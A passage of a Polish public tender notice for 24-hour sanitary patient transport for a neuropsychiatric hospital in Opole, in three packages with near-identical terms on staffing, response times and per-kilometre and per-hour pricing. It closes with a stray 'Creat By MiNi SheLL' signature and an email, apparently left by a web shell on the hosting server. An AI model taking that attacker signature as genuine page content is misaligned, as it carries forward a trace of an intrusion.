18. Czas pracy Zespołu będzie obliczany od momentu przejęcia pacjenta w siedzibie Zamawiającego, do czasu jego powrotu albo przekazania pacjenta do miejsca wskazanego w zleceniu.
19. Jako podstawę do ustalenia trasy przejazdu przyjmuje się najkrótszą możliwa trasę przejazdu. 
W sytuacjach nadzwyczajnych (roboty drogowe, zdarzenia drogowe)  Wykonawca poinformuje o powyższym Zamawiającego w celu ustalenia innej, alternatywnej trasy dojazdu.
20. Zamawiający dopuszcza składania ofert częściowych. Przedmiot zamówienia został podzielony na 3 pakiety. Wykonawca może złożyć ofertę zarówno na wszystkie pakiety, jak i na każdy wybrany przez siebie pakiet.
21. Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust. 1  pkt  7 Prawa.
22. Zamawiający nie dopuszcza składania ofert wariantowych.
23. Zamawiający nie dopuszcza podwykonawstwa w zakresie wykonywania przedmiotowej usługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Zespół Specjalistyczny P.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Nazwa zamówienia publicznego: P/10/2014 Usługi w zakresie całodobowego transportu sanitarnego pacjentów.
2.Wspólny słownik zamówień (CPV): 
60130000-8   Usługi w zakresie specjalistycznego transportu drogowego osób.
3.Wykonawca zobowiązany jest do zapewnienia całodobowego zabezpieczenia usług transportu sanitarnego, 7 dni w tygodniu w zakresie:
a)przewozu chorych wymagających konsultacji lekarza specjalisty lub wykonania badań diagnostycznych w innych zakładach opieki zdrowotnej;
b)przewozu chorych do innego zakładu celem kontynuacji leczenia;
c)transportu chorych z dysfunkcją narządu ruchu uniemożliwiającą korzystanie ze środków transportu publicznego po zakończonym leczeniu do miejsca zamieszkania.
4. Zamawiający oświadcza, że podane w Załączniku nr 1A ilości godzin i km  są ilościami szacunkowymi zamówienia  - maksymalnymi (prawo opcji)  i zamówienie to może ulec zmniejszeniu o 20%.
5. Wykonawca realizując zamówienie w ramach poszczególnych pakietów zobligowany jest do dysponowania środkami transportu sanitarnego, posiadającymi niezbędne wyposażenie oraz odpowiadającymi wszelkim wymaganiom, w tym technicznym i higienicznym, określonych przepisami prawa.
6. Wymagany skład osobowy, realizujących przedmiotowe usługi w poszczególnych zespołach  to:
a) Pakiet nr 1 - Zespół Specjalistyczny S - co najmniej 3 osoby uprawnione do wykonywania medycznych czynności ratunkowych w tym lekarza systemu, oraz pielęgniarka systemu lub ratownik medyczny;
b) Pakiet nr 2 - Zespół Podstawowy P - co najmniej dwie osoby uprawnione do wykonywania medycznych czynności ratunkowych w tym pielęgniarka systemu lub ratownik medyczny;
c) Pakiet nr 3 - Zespół Transportowy - dwie osoby, w tym co najmniej jedna uprawniona do wykonywania medycznych czynności ratunkowych. 
7. Zamawiający  zastrzega sobie prawo do przeprowadzania wyrywkowej kontroli pojazdów.
8. Wykonawca zobowiązuje się do prowadzenia sprawozdawczości statystycznej z zakresu prowadzonej działalności zgodnie z obowiązującymi przepisami oraz poddania się kontroli przeprowadzanej przez Opolski Oddział Wojewódzki Narodowego Funduszu Zdrowia w zakresie prawidłowości wykonywania przedmiotu zamówienia.
9. Wykonawca zobowiązany jest do prowadzenia dokumentacji medycznej na zasadach obowiązujących  w podmiotach leczniczych oraz  w Wojewódzkim Specjalistycznym Zespole Neuropsychiatrycznym  im. św. Jadwigi    w Opolu.
10. Wykonawca zobowiązuje się do stawienia w miejscu określonym w zleceniu lekarskim, w czasie 1 godziny od zgłoszenia (Zespół Podstawowy P, Zespół Transportowy), niezwłocznie - tryb CITO - tj. do 30 min. od momentu zgłoszenia (Zespół Specjalistyczny S) lub w godzinach ustalonych z koordynatorem zleceń Zamawiającego  w przypadku transportów planowych.
11. Wykonawca zobowiązany jest do sprawowania bezpośredniej opieki nad pacjentem od momentu rozpoczęcia usługi transportowej do momentu jej zakończenia. W przypadku przewozu pacjenta na konsultację  bądź badanie diagnostyczne Wykonawca zapewnia powrót pacjenta niezwłocznie po ich zakończeniu.
12. Zakazuje się Wykonawcy świadczenia innych usług w trakcie wykonywania zlecenia Zamawiającego.
13. Wykonawca  zobowiązuje się świadczyć usługi na rzecz Zamawiającego na podstawie pisemnych zleceń lekarskich, po telefonicznym uzgodnieniu miejsca, terminu oraz czasu przewozu i pisemnym potwierdzeniu zlecenia przewozu przez osobę upoważnioną do tego przez Zamawiającego. Zlecenie powinno zawierać datę, godzinę, nazwisko i imię chorego, miejsce docelowego transportu i podpis lekarza kierującego.
14. Zgłaszanie konieczności wykonania usługi będzie dokonywane za pośrednictwem osoby/osób wyznaczonych przez Zamawiającego telefonicznie, na numer wskazany przez Wykonawcę.
15. Cena świadczonych usług transportu sanitarnego naliczana będzie jako suma iloczynu liczby przebytych kilometrów i stawki za jeden kilometr, określonej w cenniku stanowiącym załącznik nr 1A do niniejszej umowy oraz iloczynu efektywnego czasu pracy i ceny jednostkowej określonej w cenniku stanowiącym załącznik nr 1A do niniejszej umowy. Rozliczanie za niepełną godzinę będzie obliczane proporcjonalnie w przeliczeniu na  minuty.
16. Podstawą rozliczeń jest zestawienie miesięczne zleceń wyjazdów z wyszczególnieniem godziny rozpoczęcia i zakończenia usługi, trasy przejazdu oraz liczby przebytych kilometrów według wzoru stanowiącego załącznik do umowy.
17. Ilości kilometrów będą obliczane na podstawie długości trasy przejazdu między siedzibą Zamawiającego, a miejscem określonym w zleceniu na transport pacjenta, wraz z drogą powrotną.
18. Czas pracy Zespołu będzie obliczany od momentu przejęcia pacjenta w siedzibie Zamawiającego, do czasu jego powrotu albo przekazania pacjenta do miejsca wskazanego w zleceniu.
19. Jako podstawę do ustalenia trasy przejazdu przyjmuje się najkrótszą możliwa trasę przejazdu. 
W sytuacjach nadzwyczajnych (roboty drogowe, zdarzenia drogowe)  Wykonawca poinformuje o powyższym Zamawiającego w celu ustalenia innej, alternatywnej trasy dojazdu.
20. Zamawiający dopuszcza składania ofert częściowych. Przedmiot zamówienia został podzielony na 3 pakiety. Wykonawca może złożyć ofertę zarówno na wszystkie pakiety, jak i na każdy wybrany przez siebie pakiet.
21. Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust. 1  pkt  7 Prawa.
22. Zamawiający nie dopuszcza składania ofert wariantowych.
23. Zamawiający nie dopuszcza podwykonawstwa w zakresie wykonywania przedmiotowej usługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Zespół Transportowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Nazwa zamówienia publicznego: P/10/2014 Usługi w zakresie całodobowego transportu sanitarnego pacjentów.
2.Wspólny słownik zamówień (CPV): 
60130000-8   Usługi w zakresie specjalistycznego transportu drogowego osób.
3.Wykonawca zobowiązany jest do zapewnienia całodobowego zabezpieczenia usług transportu sanitarnego, 7 dni w tygodniu w zakresie:
a)przewozu chorych wymagających konsultacji lekarza specjalisty lub wykonania badań diagnostycznych w innych zakładach opieki zdrowotnej;
b)przewozu chorych do innego zakładu celem kontynuacji leczenia;
c)transportu chorych z dysfunkcją narządu ruchu uniemożliwiającą korzystanie ze środków transportu publicznego po zakończonym leczeniu do miejsca zamieszkania.
4. Zamawiający oświadcza, że podane w Załączniku nr 1A ilości godzin i km  są ilościami szacunkowymi zamówienia  - maksymalnymi (prawo opcji)  i zamówienie to może ulec zmniejszeniu o 20%.
5. Wykonawca realizując zamówienie w ramach poszczególnych pakietów zobligowany jest do dysponowania środkami transportu sanitarnego, posiadającymi niezbędne wyposażenie oraz odpowiadającymi wszelkim wymaganiom, w tym technicznym i higienicznym, określonych przepisami prawa.
6. Wymagany skład osobowy, realizujących przedmiotowe usługi w poszczególnych zespołach  to:
a) Pakiet nr 1 - Zespół Specjalistyczny S - co najmniej 3 osoby uprawnione do wykonywania medycznych czynności ratunkowych w tym lekarza systemu, oraz pielęgniarka systemu lub ratownik medyczny;
b) Pakiet nr 2 - Zespół Podstawowy P - co najmniej dwie osoby uprawnione do wykonywania medycznych czynności ratunkowych w tym pielęgniarka systemu lub ratownik medyczny;
c) Pakiet nr 3 - Zespół Transportowy - dwie osoby, w tym co najmniej jedna uprawniona do wykonywania medycznych czynności ratunkowych. 
7. Zamawiający  zastrzega sobie prawo do przeprowadzania wyrywkowej kontroli pojazdów.
8. Wykonawca zobowiązuje się do prowadzenia sprawozdawczości statystycznej z zakresu prowadzonej działalności zgodnie z obowiązującymi przepisami oraz poddania się kontroli przeprowadzanej przez Opolski Oddział Wojewódzki Narodowego Funduszu Zdrowia w zakresie prawidłowości wykonywania przedmiotu zamówienia.
9. Wykonawca zobowiązany jest do prowadzenia dokumentacji medycznej na zasadach obowiązujących  w podmiotach leczniczych oraz  w Wojewódzkim Specjalistycznym Zespole Neuropsychiatrycznym  im. św. Jadwigi    w Opolu.
10. Wykonawca zobowiązuje się do stawienia w miejscu określonym w zleceniu lekarskim, w czasie 1 godziny od zgłoszenia (Zespół Podstawowy P, Zespół Transportowy), niezwłocznie - tryb CITO - tj. do 30 min. od momentu zgłoszenia (Zespół Specjalistyczny S) lub w godzinach ustalonych z koordynatorem zleceń Zamawiającego  w przypadku transportów planowych.
11. Wykonawca zobowiązany jest do sprawowania bezpośredniej opieki nad pacjentem od momentu rozpoczęcia usługi transportowej do momentu jej zakończenia. W przypadku przewozu pacjenta na konsultację  bądź badanie diagnostyczne Wykonawca zapewnia powrót pacjenta niezwłocznie po ich zakończeniu.
12. Zakazuje się Wykonawcy świadczenia innych usług w trakcie wykonywania zlecenia Zamawiającego.
13. Wykonawca  zobowiązuje się świadczyć usługi na rzecz Zamawiającego na podstawie pisemnych zleceń lekarskich, po telefonicznym uzgodnieniu miejsca, terminu oraz czasu przewozu i pisemnym potwierdzeniu zlecenia przewozu przez osobę upoważnioną do tego przez Zamawiającego. Zlecenie powinno zawierać datę, godzinę, nazwisko i imię chorego, miejsce docelowego transportu i podpis lekarza kierującego.
14. Zgłaszanie konieczności wykonania usługi będzie dokonywane za pośrednictwem osoby/osób wyznaczonych przez Zamawiającego telefonicznie, na numer wskazany przez Wykonawcę.
15. Cena świadczonych usług transportu sanitarnego naliczana będzie jako suma iloczynu liczby przebytych kilometrów i stawki za jeden kilometr, określonej w cenniku stanowiącym załącznik nr 1A do niniejszej umowy oraz iloczynu efektywnego czasu pracy i ceny jednostkowej określonej w cenniku stanowiącym załącznik nr 1A do niniejszej umowy. Rozliczanie za niepełną godzinę będzie obliczane proporcjonalnie w przeliczeniu na  minuty.
16. Podstawą rozliczeń jest zestawienie miesięczne zleceń wyjazdów z wyszczególnieniem godziny rozpoczęcia i zakończenia usługi, trasy przejazdu oraz liczby przebytych kilometrów według wzoru stanowiącego załącznik do umowy.
17. Ilości kilometrów będą obliczane na podstawie długości trasy przejazdu między siedzibą Zamawiającego, a miejscem określonym w zleceniu na transport pacjenta, wraz z drogą powrotną.
18. Czas pracy Zespołu będzie obliczany od momentu przejęcia pacjenta w siedzibie Zamawiającego, do czasu jego powrotu albo przekazania pacjenta do miejsca wskazanego w zleceniu.
19. Jako podstawę do ustalenia trasy przejazdu przyjmuje się najkrótszą możliwa trasę przejazdu. 
W sytuacjach nadzwyczajnych (roboty drogowe, zdarzenia drogowe)  Wykonawca poinformuje o powyższym Zamawiającego w celu ustalenia innej, alternatywnej trasy dojazdu.
20. Zamawiający dopuszcza składania ofert częściowych. Przedmiot zamówienia został podzielony na 3 pakiety. Wykonawca może złożyć ofertę zarówno na wszystkie pakiety, jak i na każdy wybrany przez siebie pakiet.
21. Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust. 1  pkt  7 Prawa.
22. Zamawiający nie dopuszcza składania ofert wariantowych.
23. Zamawiający nie dopuszcza podwykonawstwa w zakresie wykonywania przedmiotowej usługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com